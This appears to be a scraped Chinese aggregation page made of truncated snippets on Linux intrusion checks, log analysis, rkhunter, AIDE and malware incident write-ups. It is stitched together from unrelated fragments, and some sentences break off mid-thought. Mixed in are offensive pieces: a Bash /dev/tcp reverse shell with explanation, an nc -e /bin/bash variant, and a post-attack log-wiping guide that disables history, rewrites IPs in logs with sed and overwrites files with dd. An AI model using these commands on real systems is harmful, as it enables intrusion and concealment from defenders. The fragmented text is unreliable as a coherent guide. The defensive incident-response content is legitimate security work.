0x00 审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出。...who、w 0x01 日志查看 在Linux系统中,有三类主要的日志子系统: 连接时间日志: 由多个程序执行,把记录写入到/var/log/wtmp和/var/run/utmp,login等程序会更新...(utmp、wtmp日志文件是多数Linux日志子系统的关键,它保存了用户登录进入和退出的记录。...0x02 用户查看 Linux不同的用户,有不同的操作权限,但是所有用户都会在/etc/passwd /etc/shadow /etc/group /etc/group- 文件中记录; 查看详细 注:linux...*:查看cron文件是变化的详细 ls /var/spool/cron/ 检查后门 对于linux的后门检查,网络上有一些公开的工具,但是在不使用这些工具的前提时,我们可以通过一些命令来获取一些信息。
二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.../dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。...同理,Linux中还存在/dev/udp/。 要想了解“>&”和“0>&1”,首先我们要先了解一下Linux文件描述符和重定向。 linux shell下常用的文件描述符是: 1....综上所述,这句命令的意思就是,创建一个可交互的bash和一个到10.42.0.1:1234的TCP链接,然后将bash的输入输出错误都重定向到在10.42.0.1:1234监听的进程。...三.NetCat 如果目标主机支持“-e”选项的话,我们就可以直接用 nc -e /bin/bash 10.42.0.1 1234 但当不支持时,我们就要用到Linux神奇的管道了。
检查帐户 # less /etc/passwd # grep :0: /etc/passwd(检查是否产生了新用户,和UID、GID是0的用户) # ls -l /etc/passwd(查看文件修改日期...检查日志 # last(查看正常情况下登录到本机的所有用户的历史记录) 注意”entered promiscuous mode” 注意错误信息 注 意Remote Procedure Call (rpc...检查进程 # ps -aux(注意UID是0的) # lsof -p pid(察看该进程所打开端口和文件) # cat /etc/inetd.conf | grep -v “^#”(检查守护进程) 检查隐藏进程...检查网络 # ip link | grep PROMISC(正常网卡不该在promisc模式,可能存在sniffer) # lsof –i # netstat –nap(察看不正常打开的TCP/UDP端口...检查计划任务 注意root和UID是0的schedule # crontab –u root –l # cat /etc/crontab # ls /etc/cron.* 8.
Linux系统下基本命令: 要区分大小写 系统 # uname -a # 查看内核/操作系统/CPU信息 # head -n 1 /etc/issue # 查看操作系统版本 # cat /proc/cpuinfo...入侵 3.bash去掉history记录 export HISTSIZE=0 export HISTFILE=/dev/null FTP命令详解: FTP的命令行格式为: FTP使用的内部命令如下(中括号表示可选项...cdup:进入远程主机目录的父目录。 chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。...get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。...system:显示远程主机的操作系统类型
Linux入侵排查步骤 一:查看异常的进程 a、查看cpu占用最多的进程 运行top命令 交互式P键会根据CPU的占用大小进行排序 有的时候会遇到top之后cpu显示特别的低,但是服务器还特别的卡...,有可能是隐藏进程占 用了CPU,可以使用unhide或者busybox查看是否有隐藏的进程 b、占用内存最多的进程 运行top命令 交互式M键会根据MEM的占用大小进行排序 c、查找进程文件的位置 ls...五:查看是否有异常登录 Lastlog 显示所有用户最近的登录信息 /var/log/lastlog Last 列出截止目前登录过系统的用户信息 W 查看当前的登录账号信息 可以通过/var/log.../secure文件 查看登录成功、失败等信息 六:查看最近一段时间被修改的文件 查找入侵时间点修改的文件 find / -type f -newermt "2022-03-25 15:39" !...b、/etc/systemd/system/multi-user.target.wants 是否有服务的软连接 c、可以先kill -STOP $id 先禁止然后在进行排查 服务器要做好安全加固避免被入侵
一、检查系统日志 lastb //检查系统错误登陆日志,统计IP重试次数 二、检查系统用户 1、cat /etc/passwd //查看是否有异常的系统用户 2、grep "0" /etc/passwd...//查看是否产生了新用户,UID和GID为0的用户 3、ls -l /etc/passwd //查看passwd的修改时间,判断是否在不知的情况下添加用户 4、awk -F : '$3==0 {print...passwd //查看是否存在特权用户 5、awk -F : 'length($2)==0 {print $1}' /etc/shadow //查看是否存在空口令帐户 三、检查异常进程 //1、注意UID为0的进程...ps -ef //2、察看该进程所打开的端口和文件 lsof -p pid //3、检查隐藏进程 ps -ef | awk '{print }' | sort -n | uniq >1 ls /proc...t 文件名 六、检查网络 ip link | grep PROMISC //(正常网卡不该在promisc模式,可能存在sniffer) lsof –i netstat -anp //(察看不正常打开的TCP
之前一直看大佬们应急的文章,从未亲自实践,最近刚好遇到,在此总结分享出来,大佬请绕过。...扫描结果和客户给的内网端口映射表不符,询问客户后得知应该是路由器缘故导致从内网访问部分公网端口不通。 ...查看网络链接情况,sysmd 分别连接到不同的国外ip地址上。 对其中的一个ip地址进行查询为发现太坊矿池。 ...检查系统用户文件、密码文件、用户家目录,kernelsys用户ID为0并不是客户自己创建的。查看kernelsys用户登录日志未发现登录,查看拥有sudo权限的用户未发现异常。 ...三、总结 本想找找入侵者IP反社工一下,未能如愿以偿,期待下次。
在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。...HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0 02、清除系统日志痕迹 Linux...记录所有用户的登录、注销信息,使用last命令查看 /var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看 /var/log/secure 记录与安全相关的日志信息.../192.168.1.1/g' secure 03、清除web入侵痕迹 第一种方式:直接替换日志ip地址 sed -i 's/192.168.166.85/192.168.1.1/g' access.log...dd if=/dev/zero of=要删除的文件 bs=大小 count=写入的次数 (3)wipe Wipe 使用特殊的模式来重复地写文件,从磁性介质中安全擦除文件。
当Linux主机发生安全事件需要进行入侵排查时,一般可以使用常见的shell命令,通过分析主机的异常现象、进程端口、启动方式、可疑文件和日志记录等信息以确认主机是否被入侵。...在这里,结合工作中Linux安全事件分析处理办法,总结了Linux手工入侵排查过程中的分析方法。...---- 01、检查系统账号 从攻击者的角度来说,入侵者在入侵成功后,往往会留下后门以便再次访问被入侵的系统,而创建系统账号是一种比较常见的后门方式。...在做入侵排查的时候,用户配置文件/etc/passwd和密码配置文件/etc/shadow是需要去重点关注的地方。...: strings -f /proc/1461/environ | cut -f2 -d '' 列出该进程所打开的所有文件: lsof -p $PID 04、检查系统服务 Linux系统服务管理,CentOS7
Linux高级入侵检测平台- AIDE AIDE(Advanced Intrusion Detection...Environment)在linux下"一切皆是文件"这是一款针对文件和目录进行完整性对比检查的程序 如何工作 这款工具年纪也不小了,相对来同类工具Tripwire说,它的操作也更加简单。...当管理员想要对系统进行一个完整性检测时,管理员会将之前构建的数据库放置一个当前系统可访问的区域,然后用AIDE将当前系统的状态和数据库进行对比,最后将检测到的当前系统的变更情况报告给管理员。...,精简型的数据库 强大的正则表达式,轻松筛选要监视的文件和目录 支持Gzip数据库压缩 独立二进制静态编译的客户端/服务器监控配置 下载地址 http://aide.sourceforge.net 安装配置...fi find /home/ -name "aide-report-*.txt" -mtime +60 -exec rm -rf {} \; #删除60天前日志 循环脚本(防止入侵者发现计划任务) /
libtermcap.so.2 => /lib/libtermcap.so.2 (0x40022000) libc.so.6 => /lib/tls/libc.so.6 (0x42000000) /lib/ld-linux.so....2 => /lib/ld-linux.so.2 (0x40000000) strace工具是一个调试工具,它可以显示出一个程序在执行过程中的所有系统调用, [root@rh9bk root]# strace...open("/root/.telnetrc", O_RDONLY) = -1 ENOENT (No such file or directory) open("/usr/share/terminfo/l/linux...restart c.在192.168.20.163安装kiwisyslogd d.远程登陆,故意输入错误密码,可看到日志主机上马上有报警,也可以tcpdump port 514观察 17 如果知道黑客是0927入侵的.../dev/sda of=/dev/sdb bs=1024 分区复制 测试过 dd if=/dev/sda1 of=/abc bs=1024 这里是保存在了根分区,用mount查看是sda2 启动另一个linux
RKHunter是Linux系统平台下的一款开源入侵检测工具 特点 (1)安装便捷,运行快速 (2)扫描范围全,能够检测各种已知的rootkit特征码、端口扫描、常用程序文件的变动情况检查 主要功能...(1)MD5校验测试,检测任何文件是否改动 (2)检测rootkits使用的二进制和系统工具文件 (3)检测木马程序的特征码 (4)检测大多常用程序的文件异常属性 (5)扫描任何混杂模式下的接口和后门程序常用的端口...(6)检测如/etc/rc.d/目录下的所有配置文件、日志文件、任何异常的隐藏文件等等 使用方式 执行 rkhunter 的检查命令 # rkhunter -c rkhunter会进行一系列的检测...,有问题的部分会给出红色的 Warning 警告,就需要你对这些问题进行处理了 rkhunter是通过自己的数据库来检查的,所以保持数据库最新非常重要,更新数据库的命令: # rkhunter --...update 最好加入到系统的定时任务中 安装 官网 http://rkhunter.sourceforge.net/ 下载后解压,我下的是1.4.2版本 tar zxf rkhunter-1.4.2
一次Linux被入侵后的分析 下面通过一个案例介绍下当一个服务器被rootkit入侵后的处理思路和处理过程,rootkit攻击是Linux系统下最常见的攻击手段和攻击方式。...,而入侵者就是利用这个漏洞在/var/tmp目录下创建了一个“…”的目录,而在这个目录下隐藏着攻击的程序源,进入/var/tmp/…/目录,发现了一些列入侵者放置的rootkit文件,列表如下: [root...ip信息,进而获取远程主机的权限,可见这个网站服务器已经是入侵者的一个肉鸡了。...通过对这个入侵过程的分析,发现入侵者的手段还是非常简单和普遍的,虽然入侵者删除了系统的一些日志,但是还是留下了很多可查的踪迹,其实还可以查看用户下的.bash_history文件,这个文件是用户操作命令的历史记录...(4) 使用Linux下的Tcp_Wrappers防火墙,限制ssh登录的源地址。 原文地址:http://www.server110.com/linux_sec/201407/10731.html
我发现了一个网站,于是常规入侵。...很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(by the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那它的口令一般也很简单...在上网的机器上开着WINDOWS的“文件和打印机共享”的服务,是很多人容易掉以轻心的,这个root没有例外。...如果它的C盘共享了而且可写那就好了,但那是做梦,现在开了共享的目录没有一个是根目录,连D驱的都没有。别着急,慢慢来。x掉的那些文件夹都没用,不能写,里面尽是些英文原著,这个root还挺行的。...“我的公文包”吸引了我的注意,这是一个用于将不同的机器上的资料进行同步的工具,很显然这个root要经常更新主机上的主页,有时候在自己的机器上编,有时候在主机上编……所以很重要的一点:“我的公文包”的共享一般都是可写的
0x00 前言 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程...针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路。...入侵排查 1、查询已安装的服务: RPM包安装的服务 chkconfig --list 查看服务自启动状态,可以看到所有的RPM包安装的服务 ps aux | grep crond 查看当前服务...这个日志文件中会记录Linux系统的绝大多数重要信息,如果系统出现问题时,首先要检查的就应该是这个日志文件 /var/log/btmp 记录错误登录日志,这个文件是二进制文件,不能直接vi查看,而要使用...clamscan -r --remove /usr/local/zabbix/sbin #查看日志发现 cat /root/usrclamav.log |grep FOUND 三、webshell查杀 linux
MaItego 就是这样一款优秀而强大的工具。MaItego 允许从服务器中更新,整合数据,并允许用户很大程度上的的自定义,从而实现整合出最适合用户的“情报拓扑”。 怎么去利用它呢?...右下角有个输入域名的地方,输入你要检测的域名 3....从简单的域开始 剩下的点击这个浏览器的图标进行选择测试项目,比如说dns的服务器信息, 接下来email , 站长 邮箱 手机号码(通过wghost) 等,想找网站所有相关的信息可以用这个软件的功能找出...所以这些都是可以针对性的使用,例如我们可以选择审计模块的sqli选项,假设我们需要执行审计类的特殊任务。...Zed Attack Proxy简写为ZAP,是一个简单易用的渗透测试工具,是发现web应用中的漏洞的利器,更是渗透测试爱好者的好东西。
目录 排查思路 深入分析,查找入侵原因 检查恶意进程及非法端口 检查恶意程序和可疑启动项 检查第三方软件漏洞 Part2运行进程排查 Part3端口开放检查 Part4检查主机服务 Part5检查历史命令...Part6查看计划任务 Part7查看制定文件夹七天内被修改过的文件 Part8扫描主机驱动程序 Part10日志排查 Part11登陆排查 Part12启动项排查 排查思路 深入分析,查找入侵原因...· a 显示终端上的所有进程,包括其他用户的进程。 · r 只显示正在运行的进程。 · u 以用户为主的格式来显示程序状况。 · x 显示所有程序,不以终端机来区分。...记录Linux FTP日志 · /var/log/lastlog 记录登录的用户,可以使用命令lastlog查看 · /var/log/secure 记录大多数应用输入的账号与密码,登录成功与否 · /...Part11登陆排查 · who (查看当前登录的用户) · w(显示已登陆的用户,且在执行的命令) · last (查看登录成功的用户) lastb(查看最近登录失败的用户) · lastlog
大家好,又见面了,我是你们的朋友全栈君。 Linux被kdevtmpfsi挖矿病毒入侵 一....错误信息 二.解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4.删除掉kdevtmpfsi的相关文件 三.怎么预防处理这个病毒...1.首先停掉kdevtmpfsi的程序 ps aux 找到kdevtmpfsi的进程 删除掉与kdevtmpfsi相关的进程 kill -9 20267 kill -9 20367 2.删除Linux...-name kdevtmpfsi find / -name kinsing 三.怎么预防处理这个病毒 最根本的原因是自己的redis 6379配置不当导致的。...大家可以参考阿里云的Redis服务安全加固 阿里Redis服务安全加固 您的点赞,是我更新的动力!
Linux入侵经历 被入侵的一次经历 今天给大家说说一次被入侵的经历,仅供大家参考。 事件起因 2017年9月7日下午测试带宽,登录到服务器。在/tmp目录下发现可疑执行文件SPR。...果然有该进程,基本可以判断该系统已经被入侵了。 根据操作记录发现,入侵者从某个IP地址(江苏镇江电信)下载了可疑程序SPR。修改了其为可执行。然后把该程序放到了/root目录及/tmp目录。...这时判断,应该还有其他可疑的进程在作祟。 这时,检查有无可疑的定时任务,发现没有。那么,再仔细检查有无可疑的进程,发现一个名为/usr/bin/.sshd的进程。...表示设备节点的属性发生了变化 L 表示文件的符号链接发生了变化 U 表示文件/子目录/设备节点的owner发生了变化 G 表示文件/子目录/设备节点的group发生了变化 T 表示文件最后一次的修改时间发生了变化...最有可能的是修改了系统的启动脚本。 事后总结 本次系统被入侵,主要是由于系统密码过于简单所致。密码简单到。。。,哎,你懂得。 设置复杂的密码,使用工具生成随机的密码,且密码长度大于20位。
检查系统的异常文件 查看敏感目录,如/tmp目录下的文件,同时注意隐藏文件夹,以.为名的文件夹具有隐藏属性 > ls -al 查找1天以内被访问过的文件 > find /opt -iname "*"...-atime 1 -type f -iname不区分大小写,-atime最近一次被访问的时间,-type文件类型 检查历史命令 查看被入侵后,在系统上执行过哪些命令,使用root用户登录系统,检查/home...目录下的用户主目录的.bash_history文件 默认情况下,系统可以保存1000条的历史命令,并不记录命令执行的时间,根据需要进行安全加固。...,而在此之前可以进行回调的一个环境变量就是PROMPT_COMMAND,这个环境变量中设定的内容将在交互式脚本的提示(PS1)出现之前被执行。...检查系统日志 在Linux上一般跟系统相关的日志默认都会放到/var/log下面,若是一旦出现问题,用户就可以通过查看日志来迅速定位,及时解决问题。
领取专属 10元无门槛券
手把手带您无忧上云